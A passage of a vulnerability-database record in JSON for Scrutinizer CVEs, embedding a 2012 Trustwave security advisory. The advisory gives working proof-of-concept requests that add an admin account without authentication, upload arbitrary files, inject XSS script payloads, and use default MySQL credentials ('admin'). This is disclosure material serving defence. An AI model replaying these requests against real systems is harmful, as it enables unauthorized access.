"id": "CVE-2012-2626"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-31T00:00:00",
"db": "VULHUB",
"id": "VHN-55907"
},
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "54727"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"date": "2012-07-29T23:22:22",
"db": "PACKETSTORM",
"id": "115091"
},
{
"date": "2012-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-594"
},
{
"date": "2012-07-31T10:45:41.357000",
"db": "NVD",
"id": "CVE-2012-2626"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-55907"
},
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "54727"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"date": "2012-08-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-594"
},
{
"date": "2024-11-21T01:39:19.063000",
"db": "NVD",
"id": "CVE-2012-2626"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerabilities in adding administrator accounts",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
}
],
"trust": 0.6
}
}
var-201207-0303
Vulnerability from variot
The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session. Scrutinizer is prone to a security-bypass vulnerability. Successful attacks can allow an attacker to gain access to the affected application using the default authentication credentials. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12 Version: 1.0
Vendor: Plixer International (http://www.plixer.com) Product: Scrutinizer NetFlow and sFlow Analyzer Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions may be affected as well. Please note that the software can be found in a long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html for the partial list.
Product description: Network analysis tool for monitoring the overall network health and reports on which hosts, applications, protocols, etc. that are consuming network bandwidth.
Credits: Mario Ceballos of the Metasploit Project Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization is controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of "trustwave" to the administrative user group.
Request
POST /cgi-bin/admin.cgi HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:52:15 GMT Server: Apache Vary: Accept-Encoding Content-Length: 19 Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload vulnerability. An attacker could exploit this vulnerability to upload files to the affected systems file system as well as overwrite the Scrutinizer applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could be overwritten if an attacker were to select the right file name.
Request
POST /d4d/uploader.php HTTP/1.0 Host: A.B.C.D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593 Content-Length: 210
--_Part_949_3365333252_3066945593 Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt" Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:39:15 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 41 Connection: close Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
Confirming on File System
C:>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt" trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting vulnerabilities in the following pages:
1.) /d4d/contextMenu.php 2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter 3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
Request 1
GET /d4d/exporters.php?aalert(123)=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive
Response 1
/d4d/exporters.php?aalert(123)=1
Request 2
GET /d4d/exporters.php HTTP/1.1 Host: A.B.C.D Accept: / Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://D.E.F.G/search?hl=en&q=aalert(123)=1 Content-Length: 2
Response 2
http://D.E.F.G/search?hl=en&q=aalert(123)=1
Finding 4: Undocumented Default Admin MySQL Users CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP installation which is installed as part of the scrutinizer installer package. The installation of these packages are transparent to the user during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which are not configured by the user which could be easily guessed by an attacker. There is currently no way to change these values within the Scrutinizer application and changing them manually in the MySQL instance has unknown effects on the application due to hardcoded values for some of these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative passwords:
Request
select User,Password from mysql.user;
Response
User |Password root | root | scrutinizer |4ACFE3202A5FF5CF467898FC58AAB1D615029441 scrutremote |4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote' users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update, delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the equivalent of every network interface on the system allowing users with the proper access rights to interact directly with the MySQL instance.
Remediation Steps: Customers should update to the latest version of Scrutinizer NetFlow & sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been corrected in version 9.5.0.
Revision History: 05/02/12 - Vulnerability disclosed 05/16/12 - Patch released by vendor 07/11/12 - Vendor publishes announcement 07/27/12 - Advisory published
References 1. http://www.plixer.com 2. http://blog.spiderlabs.com
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201207-0303",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "scrutinizer",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "9.0.1.19899"
},
{
"model": "sonicwall scrutinizer",
"scope": "lte",
"trust": 0.8,
"vendor": "dell",
"version": "9.0.1.19899"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.1.19899"
},
{
"model": "international scrutinizer",
"scope": "eq",
"trust": 0.3,
"vendor": "plixer",
"version": "9.0.1.19899"
}
],
"sources": [
{
"db": "BID",
"id": "54731"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
},
{
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mario Ceballos of the Metasploit Project and Jonathan Claudius of Trustwave Spiderlabs",
"sources": [
{
"db": "BID",
"id": "54731"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
}
],
"trust": 0.9
},
"cve": "CVE-2012-3951",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2012-3951",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-57232",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-3951",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2012-3951",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201207-598",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-57232",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2012-3951",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57232"
},
{
"db": "VULMON",
"id": "CVE-2012-3951"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
},
{
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session. Scrutinizer is prone to a security-bypass vulnerability. \nSuccessful attacks can allow an attacker to gain access to the affected application using the default authentication credentials. \nScrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:\nMultiple Vulnerabilities in Scrutinizer NetFlow \u0026 sFlow Analyzer\n\nPublished: 07/27/12\nVersion: 1.0\n\nVendor: Plixer International (http://www.plixer.com)\nProduct: Scrutinizer NetFlow and sFlow Analyzer\nVersion affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions\nmay be affected as well. Please note that the software can be found in a\nlong list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html\nfor the partial list. \n\nProduct description:\nNetwork analysis tool for monitoring the overall network health and reports\non which hosts, applications, protocols, etc. that are consuming network\nbandwidth. \n\nCredits:\nMario Ceballos of the Metasploit Project\nJonathan Claudius of Trustwave Spiderlabs\n\nFinding 1: HTTP Authentication Bypass Vulnerability\nCVE: CVE-2012-2626\n\nThe Scrutinizer web console provides a form-based login facility, requiring\nusers to authenticate to gain access to further functionality. A tiered\nuser access model is also used, where administrative and standard users\nhave a different selection of permissible functions. Authentication and\nauthorization is controlled by the cookie-based session management system. \nAlthough this is implemented in a standardized way, the session tokens are\nnot required to perform privileged functions, such as adding users. \n\nExample(s):\n\nThis request will add a user named \"trustwave\" with the password of\n\"trustwave\" to the administrative user group. \n\n#Request\nPOST /cgi-bin/admin.cgi HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nContent-Length: 70\n\ntool=userprefs\u0026newUser=trustwave\u0026pwd=trustwave\u0026selectedUserGroup=1\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:52:15 GMT\nServer: Apache\nVary: Accept-Encoding\nContent-Length: 19\nContent-Type: text/html; charset=utf-8\n\n{\"new_user_id\":\"2\"}\n\n\nFinding 2: Arbitrary File Upload Vulnerability\nCVE: CVE-2012-2627\n\nThe Scrutinizer web console is prone to unauthenticated arbitrary file upload\nvulnerability. An attacker could exploit this vulnerability to upload files\nto the affected systems file system as well as overwrite the Scrutinizer\napplications SNMP configuration. \n\nExample(s):\n\nThis request will upload a test file to the following location:\n\n\u0027C:\\Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\u0027\n\nNote: This affected folder also contains SNMP configuration files which could\nbe overwritten if an attacker were to select the right file name. \n\n#Request\nPOST /d4d/uploader.php HTTP/1.0\nHost: A.B.C.D\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nContent-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593\nContent-Length: 210\n\n\n--_Part_949_3365333252_3066945593\nContent-Disposition: form-data;\nname=\"uploadedfile\"; filename=\"trustwave.txt\"\nContent-Type: application/octet-stream\n\ntrustwave\n\n--_Part_949_3365333252_3066945593--\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:39:15 GMT\nServer: Apache\nX-Powered-By: PHP/5.3.3\nVary: Accept-Encoding\nContent-Length: 41\nConnection: close\nContent-Type: text/html\n\n{\"success\":1,\"file_name\":\"trustwave.txt\"}\n\n#Confirming on File System\nC:\\\u003etype \"Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\"\ntrustwave\n\n\nFinding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php\nCVE: CVE-2012-3848\n\nThe Scrutinizer web console suffers from multiple Cross Site Scripting\nvulnerabilities in the following pages:\n\n1.) /d4d/contextMenu.php\n2.) /d4d/exporters.php\n\nThese vulnerabilities include the following:\n\n1.) XSS via arbitrary parameter\n3.) XSS via referrer header\n\nExample(s):\n\nThe following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php\n\n#Request 1\nGET /d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1 HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\n\n#Response 1\n\u003csnip\u003e\n\u003ca href=\"/d4d/exporters.php?a\u003cscript\u003ealert(1)\u003c/script\u003e=1\"\u003e/d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\n\u003csnip\u003e\n\n#Request 2\nGET /d4d/exporters.php HTTP/1.1\nHost: A.B.C.D\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\nConnection: close\nReferer: http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\nContent-Length: 2\n\n#Response 2\n\u003csnip\u003e\n\u003ca href=\"http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\n\u003csnip\u003e\n\nFinding 4: Undocumented Default Admin MySQL Users\nCVE: CVE-2012-3951\n\nThe Scrutinizer application relies on an underlying Apache, MySQL and PHP\ninstallation which is installed as part of the scrutinizer installer\npackage. The installation of these packages are transparent to the user\nduring the Scrutinizer installation. \n\nThe installation selects default passwords for internal MySQL Users which\nare not configured by the user which could be easily guessed by an\nattacker. There is currently no way to change these values within the\nScrutinizer application and changing them manually in the MySQL instance\nhas unknown effects on the application due to hardcoded values for some of\nthese accounts. \n\nExample(s):\n\nThe following MySQL command can be run to see the users and their relative\npasswords:\n\n#Request\nselect User,Password from mysql.user;\n\n#Response\nUser |Password\nroot |\nroot |\nscrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\nscrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\n\nNote 1: the above hash shared between the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027\nusers is equivalent to \u0027admin\u0027\n\nNote 2: the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027 users have select, update,\ndelete, create, drop, and more permissions within the MySQL instance. \n\nNote 3: By default, the MySQL instance is bound to \"0.0.0.0\", the\nequivalent of every network interface on the system allowing users with the\nproper access rights to interact directly with the MySQL instance. \n\n\nRemediation Steps:\nCustomers should update to the latest version of Scrutinizer NetFlow \u0026\nsFlow Analyzer in order to address findings 1, 2 and 3. These issues have been\ncorrected in version 9.5.0. \n\nRevision History:\n05/02/12 - Vulnerability disclosed\n05/16/12 - Patch released by vendor\n07/11/12 - Vendor publishes announcement\n07/27/12 - Advisory published\n\nReferences\n1. http://www.plixer.com\n2. http://blog.spiderlabs.com\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-3951"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"db": "BID",
"id": "54731"
},
{
"db": "VULHUB",
"id": "VHN-57232"
},
{
"db": "VULMON",
"id": "CVE-2012-3951"
},
{
"db": "PACKETSTORM",
"id": "115091"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-57232",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20355",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57232"
},
{
"db": "VULMON",
"id": "CVE-2012-3951"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-3951",
"trust": 3.0
},
{
"db": "BID",
"id": "54731",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "20305",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "20355",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "115359",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-74236",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-57232",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-3951",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "115091",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57232"
},
{
"db": "VULMON",
"id": "CVE-2012-3951"
},
{
"db": "BID",
"id": "54731"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
},
{
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"id": "VAR-201207-0303",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-57232"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:35:27.809000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dell SonicWALL Scrutinizer",
"trust": 0.8,
"url": "http://www.dell.com/us/business/p/sonicwall-scrutinizer/pd"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57232"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://www.plixer.com/press-releases/plixer-releases-9-5-2.html"
},
{
"trust": 2.6,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2012-014.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-3951"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-3951"
},
